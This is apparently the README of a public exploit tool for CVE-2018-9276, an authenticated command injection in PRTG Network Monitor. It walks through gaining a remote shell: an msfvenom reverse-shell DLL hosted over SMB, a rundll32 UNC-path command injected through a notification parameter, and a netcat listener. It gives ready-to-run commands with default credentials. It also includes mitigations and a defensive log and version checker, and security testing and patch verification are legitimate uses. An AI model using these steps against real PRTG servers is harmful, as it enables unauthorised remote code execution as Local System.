## https://sploitus.com/exploit?id=17EC6402-3592-524E-855F-9BDAADA3BB88
# CVE-2018-9276 – PRTG Network Monitor

**⚠️ Disclaimer:** This tool is intended for educational purposes and authorized penetration testing only. Use it only against systems you own or have explicit written permission to test. Unauthorized use is illegal.
---
## Table of Contents
- [Overview](#overview)
- [Vulnerability Details](#vulnerability-details)
- [How It Works](#how-it-works)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
- [Examples](#examples)
- [Mitigations](#mitigations)
- [References](#references)
---
## Overview
**PRTG Network Monitor** is a network monitoring tool developed by Paessler AG. Versions prior to **18.2.39** are vulnerable to an authenticated command injection via the notifications feature, allowing an attacker with valid credentials to achieve **Remote Code Execution (RCE)** as **Local System** (the default service account for PRTG installations).
This vulnerability was discovered during a penetration test by Josh Berry and disclosed to Paessler AG, who released a patch on **April 20, 2018**. It was assigned **CVE-2018-9276**.
---
## Vulnerability Details
| Field | Value |
|-------------|--------------------------------------------|
| CVE | CVE-2018-9276 |
| Affected | PRTG Network Monitor |

## How It Works

**Note:** The batch script (`OutFile.bat`) is **not** vulnerable; Paessler appears to sanitize input before passing it to the batch file. The injection only works via the `.ps1` script.
### Exploit Flow
The exploit automates the following steps:
```
1. Check server version → confirm target is vulnerable
2. Authenticate → obtain a valid session cookie
3. Stage a file notification → initialise a writable output file on the target
4. Trigger the file notification → execute it via /api/notificationtest.htm
5. Generate a reverse shell DLL → msfvenom (windows/shell_reverse_tcp)
6. Host the DLL → serve it over SMB from the attacker machine
7. Stage a command notification → inject rundll32.exe <dll path>,0 after the output file
8. Trigger the command notification → execute the DLL on the target
9. Catch the reverse shell → nc -nvlp <lport>
```
### Why rundll32 + SMB?
PRTG only allows scripts located in its installation directory to run as notifications, so we cannot simply upload and execute an arbitrary binary. Instead, we:
1. Use `msfvenom` to generate a Windows reverse shell as a `.dll` file.
2. Host that `.dll` on an SMB share on the attacker machine.
3. Inject a `rundll32.exe \\attacker\share\payload.dll,0` command via the PowerShell notification parameter.
`rundll32.exe` can load and execute a DLL from a UNC path, bypassing the restriction on which files PRTG can directly execute.
---
## Requirements
- Python 3.8+
- `msfvenom` (part of Metasploit Framework)
- `netcat` (`nc`)
- `impacket` – only needed for the built-in SMB server (optional, see `--no-smb`)
```bash
pip install impacket
```
> If you already have a way to host the DLL (e.g. `impacket-smbserver`, Metasploit's `exploit/multi/handler`, or another SMB server), you can skip impacket entirely using `--no-smb` and `--shell-location`.
---
## Installation
```bash
git clone https://github.com//cve_2018_9276.git
cd cve_2018_9276
pip install -r requirements.txt # only impacket
```
---
## Usage
```
usage: cve_2018_9276.py [-h] -i HOST -p PORT --lhost LHOST --lport LPORT
[--user USER] [--password PASSWORD] [--https]
[--no-smb] [--shell-location SHELL_LOCATION] [-v]
options:
-i, --host Target IP or hostname
-p, --port Target port (e.g. 80 or 443)
--lhost Local IP for the reverse shell callback
--lport Local port for the reverse shell callback
--user PRTG username (default: prtgadmin)
--password PRTG password (default: prtgadmin)
--https Use HTTPS (self-signed certificates accepted)
--no-smb Skip the built-in SMB server (payload already hosted)
--shell-location Override the UNC path to the DLL payload
-v, --verbose Enable verbose / debug output
```
---
## Examples
### Basic usage (HTTP, default credentials)
```bash
python3 cve_2018_9276.py \
-i 10.10.10.10 \
-p 80 \
--lhost 10.10.14.5 \
--lport 4444
```
### HTTPS target with custom credentials
```bash
python3 cve_2018_9276.py \
-i 10.10.10.10 \
-p 443 \
--lhost 10.10.14.5 \
--lport 4444 \
--user admin \
--password Sup3rS3cr3t \
--https
```
### Skip the built-in SMB server (payload hosted externally)
```bash
# Host the payload yourself first:
impacket-smbserver share /tmp -smb2support
# Then run the exploit pointing to your share:
python3 cve_2018_9276.py \
-i 10.10.10.10 \
-p 80 \
--lhost 10.10.14.5 \
--lport 4444 \
--no-smb \
--shell-location '\\10.10.14.5\share\payload.dll'
```
---
## Mitigations
- **Update PRTG** to version 18.2.39 or later – this is the only complete fix.
- **Change default credentials** – the vulnerability requires authentication; weak or default credentials (`prtgadmin / prtgadmin`) dramatically lower the barrier to exploitation.
- **Restrict network access** to the PRTG web interface (firewall rules, VPN, etc.).
- **Monitor PRTG logs** for unexpected notification test executions.
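The two checks above that a defender can script are the version gate (anything before 18.2.39) and the notification-test endpoint the exploit flow hits. The following is an added example, not code from this repository or from Paessler; it assumes a generic combined web-log format (PRTG's real log layout may differ) and uses constructed sample lines.

```python
import re
from typing import Dict, List

# First fixed release per the advisory: versions prior to 18.2.39 are vulnerable.
FIXED_VERSION = (18, 2, 39)

def is_vulnerable_version(version: str) -> bool:
    """True if a PRTG version string (e.g. '18.1.37.13946') predates the 18.2.39 fix."""
    parts = tuple(int(p) for p in version.strip().split(".")[:3])
    parts = parts + (0,) * (3 - len(parts))  # pad short strings such as '18.2'
    return parts < FIXED_VERSION

# Constructed sample lines (assumed combined-log layout, not PRTG's own format).
SAMPLE_LOG = """\
10.0.0.7 - prtgadmin [20/Apr/2018:10:01:02 +0000] "GET /api/table.json?content=sensors HTTP/1.1" 200 1532
10.0.0.9 - prtgadmin [20/Apr/2018:10:02:15 +0000] "POST /api/notificationtest.htm?id=2001 HTTP/1.1" 200 45
10.0.0.9 - prtgadmin [20/Apr/2018:10:02:16 +0000] "POST /api/notificationtest.htm?id=2002 HTTP/1.1" 200 45
10.0.0.7 - - [20/Apr/2018:10:03:00 +0000] "GET /index.htm HTTP/1.1" 200 8812
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def find_notification_tests(log_text: str) -> List[Dict[str, str]]:
    """One record per request to the notification-test endpoint used in the exploit flow."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed layout
        if m.group("path").split("?")[0].lower() == "/api/notificationtest.htm":
            hits.append({k: m.group(k) for k in ("ip", "user", "ts", "method", "path")})
    return hits

def suspicious_sources(hits: List[Dict[str, str]], threshold: int = 2) -> List[str]:
    """Source IPs that fired notification tests at least `threshold` times; review these."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)

if __name__ == "__main__":
    hits = find_notification_tests(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ts"]} {h["ip"]} ({h["user"]}) {h["method"]} {h["path"]}')
    print("review:", suspicious_sources(hits))
```

Legitimate administrators also trigger notification tests, so treat the output as a review queue and correlate it with who held the account at that time.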
---
## References
- [Original Discovery – CodeWatch (Josh Berry)](https://codewatch.org/2018/06/25/prtg-18-2-39-command-injection-vulnerability/)
- [NVD – CVE-2018-9276](https://nvd.nist.gov/vuln/detail/CVE-2018-9276)
- [Paessler AG Patch History](https://www.paessler.com/prtg/history/stable)
- [Original PoC by wildkindcc](https://github.com/wildkindcc/CVE-2018-9276)